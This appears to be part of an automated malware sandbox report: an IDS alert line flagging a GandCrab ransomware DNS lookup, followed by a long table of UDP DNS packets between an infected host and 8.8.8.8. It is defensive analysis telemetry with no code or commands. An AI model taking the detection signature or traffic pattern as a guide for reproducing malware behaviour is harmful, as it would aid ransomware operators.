192.168.2.38.8.8.855956532829500 09/01/22-00:03:25.650230	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	55956	53	192.168.2.3	8.8.8.8

Network Port Distribution

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 1, 2022 00:01:23.064902067 CEST	53975	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:01:23.084820032 CEST	53	53975	8.8.8.8	192.168.2.3
Sep 1, 2022 00:01:23.994477034 CEST	51139	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:01:24.030497074 CEST	53	51139	8.8.8.8	192.168.2.3
Sep 1, 2022 00:01:24.049179077 CEST	51140	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:01:24.067482948 CEST	53	51140	8.8.8.8	192.168.2.3
Sep 1, 2022 00:01:24.068248034 CEST	51141	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:01:24.088715076 CEST	53	51141	8.8.8.8	192.168.2.3
Sep 1, 2022 00:01:24.090037107 CEST	51142	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:01:24.110754013 CEST	53	51142	8.8.8.8	192.168.2.3
Sep 1, 2022 00:01:24.124614954 CEST	51143	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:01:24.144764900 CEST	53	51143	8.8.8.8	192.168.2.3
Sep 1, 2022 00:01:24.145241976 CEST	51144	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:01:24.164725065 CEST	53	51144	8.8.8.8	192.168.2.3
Sep 1, 2022 00:01:25.247797012 CEST	52955	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:01:25.283262014 CEST	53	52955	8.8.8.8	192.168.2.3
Sep 1, 2022 00:01:25.310718060 CEST	52956	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:01:25.327796936 CEST	53	52956	8.8.8.8	192.168.2.3
Sep 1, 2022 00:01:25.328521967 CEST	52957	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:01:25.346643925 CEST	53	52957	8.8.8.8	192.168.2.3
Sep 1, 2022 00:01:25.347117901 CEST	52958	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:01:25.366964102 CEST	53	52958	8.8.8.8	192.168.2.3
Sep 1, 2022 00:01:25.367458105 CEST	52959	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:01:25.385024071 CEST	53	52959	8.8.8.8	192.168.2.3
Sep 1, 2022 00:01:25.385521889 CEST	52960	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:01:25.405503035 CEST	53	52960	8.8.8.8	192.168.2.3
Sep 1, 2022 00:01:26.844472885 CEST	60582	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:01:27.449457884 CEST	53	60582	8.8.8.8	192.168.2.3
Sep 1, 2022 00:01:27.464441061 CEST	60583	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:01:27.481861115 CEST	53	60583	8.8.8.8	192.168.2.3
Sep 1, 2022 00:01:27.482734919 CEST	60584	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:01:27.502418995 CEST	53	60584	8.8.8.8	192.168.2.3
Sep 1, 2022 00:01:27.503001928 CEST	60585	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:01:27.520689964 CEST	53	60585	8.8.8.8	192.168.2.3
Sep 1, 2022 00:01:27.526552916 CEST	60586	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:01:27.550129890 CEST	53	60586	8.8.8.8	192.168.2.3
Sep 1, 2022 00:01:27.550731897 CEST	60587	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:01:27.573137045 CEST	53	60587	8.8.8.8	192.168.2.3
Sep 1, 2022 00:01:33.534245014 CEST	57134	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:01:34.108952045 CEST	53	57134	8.8.8.8	192.168.2.3
Sep 1, 2022 00:01:34.150069952 CEST	57135	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:01:34.169861078 CEST	53	57135	8.8.8.8	192.168.2.3
Sep 1, 2022 00:01:34.170593023 CEST	57136	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:01:34.192428112 CEST	53	57136	8.8.8.8	192.168.2.3
Sep 1, 2022 00:01:34.192981005 CEST	57137	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:01:34.214257956 CEST	53	57137	8.8.8.8	192.168.2.3
Sep 1, 2022 00:01:34.214782953 CEST	57138	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:01:34.234899998 CEST	53	57138	8.8.8.8	192.168.2.3
Sep 1, 2022 00:01:34.235760927 CEST	57139	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:01:34.256675959 CEST	53	57139	8.8.8.8	192.168.2.3
Sep 1, 2022 00:01:35.764401913 CEST	62050	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:01:36.800379992 CEST	62050	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:01:37.845704079 CEST	62050	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:01:38.424983025 CEST	53	62050	8.8.8.8	192.168.2.3
Sep 1, 2022 00:01:38.440474033 CEST	56043	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:01:38.459913969 CEST	53	56043	8.8.8.8	192.168.2.3
Sep 1, 2022 00:01:38.460692883 CEST	56044	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:01:38.478588104 CEST	53	56044	8.8.8.8	192.168.2.3
Sep 1, 2022 00:01:38.479108095 CEST	56045	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:01:38.499536037 CEST	53	56045	8.8.8.8	192.168.2.3
Sep 1, 2022 00:01:38.500366926 CEST	56046	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:01:38.522388935 CEST	53	56046	8.8.8.8	192.168.2.3
Sep 1, 2022 00:01:38.529181004 CEST	56047	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:01:38.547306061 CEST	53	56047	8.8.8.8	192.168.2.3
Sep 1, 2022 00:01:39.520437956 CEST	53	62050	8.8.8.8	192.168.2.3
Sep 1, 2022 00:01:39.759217024 CEST	59636	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:01:39.869720936 CEST	53	59636	8.8.8.8	192.168.2.3
Sep 1, 2022 00:01:39.895581007 CEST	59637	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:01:39.914973974 CEST	53	59637	8.8.8.8	192.168.2.3
Sep 1, 2022 00:01:39.931324959 CEST	59638	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:01:39.951137066 CEST	53	59638	8.8.8.8	192.168.2.3
Sep 1, 2022 00:01:39.951734066 CEST	59639	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:01:39.971240997 CEST	53	59639	8.8.8.8	192.168.2.3
Sep 1, 2022 00:01:39.971865892 CEST	59640	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:01:39.989907026 CEST	53	59640	8.8.8.8	192.168.2.3
Sep 1, 2022 00:01:39.990387917 CEST	59641	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:01:40.010957003 CEST	53	59641	8.8.8.8	192.168.2.3
Sep 1, 2022 00:01:40.783550978 CEST	53	62050	8.8.8.8	192.168.2.3
Sep 1, 2022 00:01:41.157733917 CEST	55638	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:01:41.194181919 CEST	53	55638	8.8.8.8	192.168.2.3
Sep 1, 2022 00:01:41.261158943 CEST	55639	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:01:41.280056000 CEST	53	55639	8.8.8.8	192.168.2.3
Sep 1, 2022 00:01:41.280695915 CEST	55640	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:01:41.300605059 CEST	53	55640	8.8.8.8	192.168.2.3
Sep 1, 2022 00:01:41.302395105 CEST	55641	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:01:41.320178032 CEST	53	55641	8.8.8.8	192.168.2.3
Sep 1, 2022 00:01:41.321666956 CEST	55642	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:01:41.341320992 CEST	53	55642	8.8.8.8	192.168.2.3
Sep 1, 2022 00:01:41.349610090 CEST	55643	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:01:41.369268894 CEST	53	55643	8.8.8.8	192.168.2.3
Sep 1, 2022 00:01:42.602513075 CEST	57704	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:01:42.639774084 CEST	53	57704	8.8.8.8	192.168.2.3
Sep 1, 2022 00:01:42.666846037 CEST	57705	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:01:42.685431004 CEST	53	57705	8.8.8.8	192.168.2.3
Sep 1, 2022 00:01:42.686131001 CEST	57706	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:01:42.707127094 CEST	53	57706	8.8.8.8	192.168.2.3
Sep 1, 2022 00:01:42.707643986 CEST	57707	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:01:42.729058981 CEST	53	57707	8.8.8.8	192.168.2.3
Sep 1, 2022 00:01:42.729662895 CEST	57708	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:01:42.750449896 CEST	53	57708	8.8.8.8	192.168.2.3
Sep 1, 2022 00:01:42.750967026 CEST	57709	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:01:42.771682978 CEST	53	57709	8.8.8.8	192.168.2.3
Sep 1, 2022 00:01:43.750798941 CEST	65320	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:01:43.786712885 CEST	53	65320	8.8.8.8	192.168.2.3
Sep 1, 2022 00:01:43.818617105 CEST	65321	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:01:43.837654114 CEST	53	65321	8.8.8.8	192.168.2.3
Sep 1, 2022 00:01:43.838372946 CEST	65322	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:01:43.857835054 CEST	53	65322	8.8.8.8	192.168.2.3
Sep 1, 2022 00:01:43.859132051 CEST	65323	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:01:43.878863096 CEST	53	65323	8.8.8.8	192.168.2.3
Sep 1, 2022 00:01:43.883100033 CEST	65324	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:01:43.902585030 CEST	53	65324	8.8.8.8	192.168.2.3
Sep 1, 2022 00:01:43.903173923 CEST	65325	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:01:43.922862053 CEST	53	65325	8.8.8.8	192.168.2.3
Sep 1, 2022 00:01:44.873297930 CEST	60767	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:01:45.412717104 CEST	53	60767	8.8.8.8	192.168.2.3
Sep 1, 2022 00:01:45.432225943 CEST	60768	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:01:45.450937986 CEST	53	60768	8.8.8.8	192.168.2.3
Sep 1, 2022 00:01:45.451637030 CEST	60769	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:01:45.472791910 CEST	53	60769	8.8.8.8	192.168.2.3
Sep 1, 2022 00:01:45.473540068 CEST	60770	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:01:45.495043039 CEST	53	60770	8.8.8.8	192.168.2.3
Sep 1, 2022 00:01:45.495695114 CEST	60771	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:01:45.514930964 CEST	53	60771	8.8.8.8	192.168.2.3
Sep 1, 2022 00:01:45.515640020 CEST	60772	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:01:45.535151958 CEST	53	60772	8.8.8.8	192.168.2.3
Sep 1, 2022 00:01:46.825660944 CEST	65107	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:01:46.863656044 CEST	53	65107	8.8.8.8	192.168.2.3
Sep 1, 2022 00:01:46.895714045 CEST	65108	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:01:46.913108110 CEST	53	65108	8.8.8.8	192.168.2.3
Sep 1, 2022 00:01:46.914019108 CEST	65109	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:01:46.933680058 CEST	53	65109	8.8.8.8	192.168.2.3
Sep 1, 2022 00:01:46.934129953 CEST	65110	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:01:46.953710079 CEST	53	65110	8.8.8.8	192.168.2.3
Sep 1, 2022 00:01:46.954180956 CEST	65111	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:01:46.973721981 CEST	53	65111	8.8.8.8	192.168.2.3
Sep 1, 2022 00:01:46.974641085 CEST	65112	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:01:46.994463921 CEST	53	65112	8.8.8.8	192.168.2.3
Sep 1, 2022 00:01:47.966227055 CEST	53848	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:01:48.969243050 CEST	53848	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:01:50.027492046 CEST	53848	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:01:50.163376093 CEST	53	53848	8.8.8.8	192.168.2.3
Sep 1, 2022 00:01:50.193775892 CEST	53849	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:01:50.211262941 CEST	53	53849	8.8.8.8	192.168.2.3
Sep 1, 2022 00:01:50.247028112 CEST	53850	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:01:50.265369892 CEST	53	53850	8.8.8.8	192.168.2.3
Sep 1, 2022 00:01:50.267332077 CEST	53851	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:01:50.285290956 CEST	53	53851	8.8.8.8	192.168.2.3
Sep 1, 2022 00:01:50.489646912 CEST	53852	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:01:50.507364035 CEST	53	53852	8.8.8.8	192.168.2.3
Sep 1, 2022 00:01:50.543832064 CEST	53853	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:01:50.561597109 CEST	53	53853	8.8.8.8	192.168.2.3
Sep 1, 2022 00:01:50.793282986 CEST	53	53848	8.8.8.8	192.168.2.3
Sep 1, 2022 00:01:52.259315968 CEST	53	53848	8.8.8.8	192.168.2.3
Sep 1, 2022 00:01:52.586035013 CEST	57571	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:01:53.162805080 CEST	53	57571	8.8.8.8	192.168.2.3
Sep 1, 2022 00:01:53.206665039 CEST	57572	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:01:53.225925922 CEST	53	57572	8.8.8.8	192.168.2.3
Sep 1, 2022 00:01:53.226526976 CEST	57573	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:01:53.246345043 CEST	53	57573	8.8.8.8	192.168.2.3
Sep 1, 2022 00:01:53.251460075 CEST	57574	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:01:53.271325111 CEST	53	57574	8.8.8.8	192.168.2.3
Sep 1, 2022 00:01:53.271847010 CEST	57575	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:01:53.289664030 CEST	53	57575	8.8.8.8	192.168.2.3
Sep 1, 2022 00:01:53.290249109 CEST	57576	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:01:53.310367107 CEST	53	57576	8.8.8.8	192.168.2.3
Sep 1, 2022 00:01:54.258793116 CEST	53305	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:01:54.812717915 CEST	53	53305	8.8.8.8	192.168.2.3
Sep 1, 2022 00:01:54.856652975 CEST	53306	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:01:54.875181913 CEST	53	53306	8.8.8.8	192.168.2.3
Sep 1, 2022 00:01:54.875889063 CEST	53307	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:01:54.897751093 CEST	53	53307	8.8.8.8	192.168.2.3
Sep 1, 2022 00:01:54.898417950 CEST	53308	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:01:54.917856932 CEST	53	53308	8.8.8.8	192.168.2.3
Sep 1, 2022 00:01:54.918395996 CEST	53309	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:01:54.939847946 CEST	53	53309	8.8.8.8	192.168.2.3
Sep 1, 2022 00:01:54.940366030 CEST	53310	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:01:54.961664915 CEST	53	53310	8.8.8.8	192.168.2.3
Sep 1, 2022 00:01:55.904305935 CEST	59433	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:01:56.898372889 CEST	59433	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:01:57.544912100 CEST	53	59433	8.8.8.8	192.168.2.3
Sep 1, 2022 00:01:57.597537994 CEST	59434	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:01:57.616928101 CEST	53	59434	8.8.8.8	192.168.2.3
Sep 1, 2022 00:01:57.617695093 CEST	59435	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:01:57.637340069 CEST	53	59435	8.8.8.8	192.168.2.3
Sep 1, 2022 00:01:57.638087034 CEST	59436	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:01:57.657670021 CEST	53	59436	8.8.8.8	192.168.2.3
Sep 1, 2022 00:01:57.658266068 CEST	59437	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:01:57.680296898 CEST	53	59437	8.8.8.8	192.168.2.3
Sep 1, 2022 00:01:57.681284904 CEST	59438	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:01:57.700737000 CEST	53	59438	8.8.8.8	192.168.2.3
Sep 1, 2022 00:01:58.788856030 CEST	53844	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:01:59.361457109 CEST	53	53844	8.8.8.8	192.168.2.3
Sep 1, 2022 00:01:59.402009010 CEST	53845	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:01:59.421237946 CEST	53	53845	8.8.8.8	192.168.2.3
Sep 1, 2022 00:01:59.423880100 CEST	53846	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:01:59.443866014 CEST	53	53846	8.8.8.8	192.168.2.3
Sep 1, 2022 00:01:59.444335938 CEST	53847	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:01:59.462193966 CEST	53	53847	8.8.8.8	192.168.2.3
Sep 1, 2022 00:01:59.462826967 CEST	53848	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:01:59.482578039 CEST	53	53848	8.8.8.8	192.168.2.3
Sep 1, 2022 00:01:59.483040094 CEST	53849	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:01:59.500787973 CEST	53	53849	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:00.502871990 CEST	53466	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:00.540338039 CEST	53	53466	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:00.582490921 CEST	53467	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:00.602976084 CEST	53	53467	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:00.604247093 CEST	53468	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:00.623477936 CEST	53	53468	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:00.624524117 CEST	53469	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:00.645464897 CEST	53	53469	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:00.646017075 CEST	53470	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:00.665227890 CEST	53	53470	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:00.665796041 CEST	53471	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:00.686867952 CEST	53	53471	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:01.677488089 CEST	53623	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:01.711468935 CEST	53	53623	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:01.768798113 CEST	53624	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:01.787820101 CEST	53	53624	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:01.788641930 CEST	53625	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:01.813957930 CEST	53	53625	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:01.814516068 CEST	53626	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:01.832298040 CEST	53	53626	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:01.832803965 CEST	53627	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:01.850697994 CEST	53	53627	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:01.851233959 CEST	53628	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:01.870028019 CEST	53	53628	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:01.915724039 CEST	53	59433	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:02.841990948 CEST	61416	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:02.924088001 CEST	53	61416	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:02.966444016 CEST	61417	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:02.983864069 CEST	53	61417	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:02.984507084 CEST	61418	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:03.004199028 CEST	53	61418	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:03.004766941 CEST	61419	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:03.022608995 CEST	53	61419	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:03.023139000 CEST	61420	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:03.041289091 CEST	53	61420	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:03.043257952 CEST	61421	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:03.060731888 CEST	53	61421	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:04.111052990 CEST	65196	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:04.694045067 CEST	53	65196	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:04.748806953 CEST	65197	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:04.767615080 CEST	53	65197	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:04.768620968 CEST	65198	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:04.790055037 CEST	53	65198	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:04.790776014 CEST	65199	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:04.812170982 CEST	53	65199	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:04.820486069 CEST	65200	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:04.841615915 CEST	53	65200	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:04.842170000 CEST	65201	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:04.861390114 CEST	53	65201	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:05.931890965 CEST	58708	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:06.949732065 CEST	58708	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:07.982110023 CEST	58708	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:10.088450909 CEST	58708	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:10.950472116 CEST	53	58708	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:11.685623884 CEST	59582	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:11.704813957 CEST	53	59582	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:11.706173897 CEST	59583	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:11.725864887 CEST	53	59583	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:11.726578951 CEST	59584	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:11.746112108 CEST	53	59584	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:11.746819973 CEST	59585	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:11.766913891 CEST	53	59585	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:11.767488003 CEST	59586	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:11.787333965 CEST	53	59586	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:11.967653036 CEST	53	58708	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:12.846661091 CEST	53049	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:12.999161005 CEST	53	58708	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:13.892630100 CEST	53049	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:14.387511015 CEST	53	58708	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:14.908216953 CEST	53049	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:14.971482038 CEST	53	53049	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:14.995146036 CEST	53050	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:15.014755964 CEST	53	53050	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:15.015451908 CEST	53051	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:15.035367012 CEST	53	53051	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:15.036326885 CEST	53052	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:15.056536913 CEST	53	53052	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:15.057233095 CEST	53053	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:15.078147888 CEST	53	53053	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:15.078815937 CEST	53054	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:15.099627018 CEST	53	53054	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:15.420219898 CEST	60088	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:16.408524990 CEST	60088	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:16.448688984 CEST	53	60088	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:16.468611002 CEST	60089	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:16.488795042 CEST	53	60089	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:16.489371061 CEST	60090	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:16.509176016 CEST	53	60090	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:16.509694099 CEST	60091	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:16.530898094 CEST	53	60091	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:16.532569885 CEST	60092	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:16.553879023 CEST	53	60092	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:16.558553934 CEST	60093	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:16.580022097 CEST	53	60093	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:16.953728914 CEST	63562	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:16.991344929 CEST	53	63562	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:17.000292063 CEST	63563	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:17.021205902 CEST	53	63563	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:17.026690006 CEST	63564	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:17.048921108 CEST	53	63564	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:17.049623013 CEST	63565	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:17.068710089 CEST	53	63565	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:17.069143057 CEST	63566	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:17.089041948 CEST	53	63566	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:17.089606047 CEST	63567	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:17.109560966 CEST	53	63567	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:17.505155087 CEST	53	60088	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:17.824410915 CEST	53428	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:18.361676931 CEST	53	53428	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:18.368638039 CEST	53429	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:18.389043093 CEST	53	53429	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:18.389777899 CEST	53430	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:18.408541918 CEST	53	53430	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:18.409895897 CEST	53431	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:18.427966118 CEST	53	53431	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:18.428585052 CEST	53432	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:18.449790001 CEST	53	53432	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:18.458137989 CEST	53433	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:18.479060888 CEST	53	53433	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:18.825237036 CEST	65511	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:18.912440062 CEST	53	53049	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:19.401741028 CEST	53	65511	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:19.409481049 CEST	65512	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:19.430453062 CEST	53	65512	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:19.430994987 CEST	65513	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:19.450289965 CEST	53	65513	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:19.450711966 CEST	65514	53	192.168.2.3	8.8.8.8
